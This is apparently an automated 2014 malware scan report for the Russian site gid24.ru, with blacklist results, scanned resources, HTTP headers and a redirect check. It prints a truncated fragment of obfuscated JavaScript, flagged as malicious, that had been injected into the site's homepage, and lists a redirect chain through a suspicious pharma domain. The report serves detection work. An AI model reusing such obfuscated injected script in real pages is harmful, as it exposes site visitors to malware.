Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gid24.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gid24.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gid24.ru/ | 200 OK Content-Length: 78125 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function h34c04fa8307(k93be50){var gb721c7c=String,sda8d3=k93be50.substr(4,3)-600,c45da53b,b1a4b09e;k93be50=k93be50.substr(7);var ff6005=k93be50.length;for(var mbc06d6b=0;mbc06d6b<ff6005;mbc06d6b++){try{throw(l931a861=p1aedd(k93be50,mbc06d6b));}catch(e){l931a861=e;};if(l931a861=='}'){sda8d3="";mbc06d6b++;cd2015fd=acea6c7(k93be50,mbc06d6b);while(cd2015fd!='}'){sda8d3+=cd2015fd;mbc06d6b++;cd2015fd=k93be50.substr(mbc06d6b,1);}sda8d3-=626;continue;}c45da53b="";if(r9d4683c(l931 Antivirus reports:
| ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12149 Content-Type: application/javascript | clean |
http://www.google.ru/coop/cse/brand?form=cse-search-box&lang=ru | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21269 Content-Type: text/javascript | clean |
http://gid24.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 302 Found Connection: close Date: Sat, 02 Aug 2014 05:03:24 GMT Location: http://superkarmapharma.com/ Server: nginx/1.4.3 Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://superkarmapharma.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 02 Aug 2014 05:03:24 GMT Location: http://remedialbestprogram.eu Server: nginx/1.6.0 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.28 | clean |
http://remedialbestprogram.eu/ | 403 Forbidden Content-Length: 168 Content-Type: text/html | clean |
http://remedialbestprogram.eu/test404page.js | 403 Forbidden Content-Length: 168 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2723757 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gid24.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 02 Aug 2014 05:03:21 GMT
Pragma: no-cache
Server: nginx/1.4.3
Content-Type: text/html
Expires: Mon, 15 apr 2009 05:00:00 GMT
Last-Modified: Sat, 02 Aug 2014 05:03:21 GMT
Set-Cookie: PHPSESSID=15aefae50b7108ea1c6c7db4c46b69c0; path=/
Set-Cookie: __utmr_cache=cut_; expires=Tue, 31-Dec-2019 22:00:00 GMT
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: gid24.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 02 Aug 2014 05:03:21 GMT
Pragma: no-cache
Server: nginx/1.4.3
Content-Type: text/html
Expires: Mon, 15 apr 2009 05:00:00 GMT
Last-Modified: Sat, 02 Aug 2014 05:03:21 GMT
Set-Cookie: PHPSESSID=15aefae50b7108ea1c6c7db4c46b69c0; path=/
Set-Cookie: __utmr_cache=cut_; expires=Tue, 31-Dec-2019 22:00:00 GMT
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: gid24.ru
Referer: http://www.google.com/search?q=gid24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gid24.ru
Referer: http://www.google.com/search?q=gid24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.